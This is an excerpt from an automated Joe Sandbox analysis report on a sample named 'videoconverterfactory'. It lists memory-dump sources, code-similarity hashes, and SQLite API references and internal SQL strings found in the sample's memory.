• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
• String ID:
• API String ID: 2794791986-0
• Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
• Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
• Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
• Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_stricmp
• String ID: USING COVERING INDEX $DISTINCT$ORDER BY
• API String ID: 912767213-1308749736
• Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
• Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
• Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
• Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6094B488
• sqlite3_step.SQLITE3 ref: 6094B496
• sqlite3_reset.SQLITE3 ref: 6094B4A4
• sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
• sqlite3_step.SQLITE3 ref: 6094B4E0
• sqlite3_reset.SQLITE3 ref: 6094B4EE
  • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
• String ID:
• API String ID: 4082478743-0
• Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                      • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                                      • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                      • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                                        • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                                        • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                                        • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                                      • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: BINARY$INTEGER
                                                                                                      • API String ID: 317512412-1676293250
                                                                                                      • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                      • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                                      • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                      • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                                      • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 2802900177-0
                                                                                                      • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                      • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                                      • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                      • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                                        • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                                        • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                                        • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                      • String ID:
                                                                                                      • API String ID: 4038589952-0
                                                                                                      • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                      • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                                      • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                      • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                                      APIs
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                        • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 247099642-0
                                                                                                      • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                      • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                                      • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                      • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                                      APIs
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                        • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                                      • String ID:
                                                                                                      • API String ID: 326482775-0
                                                                                                      • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                      • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                                      • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                      • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 3305529457-0
                                                                                                      • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                      • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                                                      • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                      • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                                        • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                      • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                                      • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                                      • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                                      • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                                      APIs
                                                                                                      • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926526
                                                                                                      • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926550
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                        • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926626
                                                                                                      • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926638
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926673
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                                      • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                      • API String ID: 937752868-2111127023
                                                                                                      • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                      • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                                      • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                      • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                                      • String ID: @$access$cache
                                                                                                      • API String ID: 4158134138-1361544076
                                                                                                      • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                      • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                                                      • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                      • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                                      • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                                      • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                                      • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                                      • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                                      • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                                      • BEGIN;, xrefs: 609485DB
                                                                                                      • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                                      • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                                      • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                                      • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                                      • API String ID: 632333372-52344843
                                                                                                      • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                      • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                                      • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                      • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                                      APIs
                                                                                                        • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                        • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                        • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                                      • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                                      • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                                      • sqlite3_free.SQLITE3 ref: 60960618
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
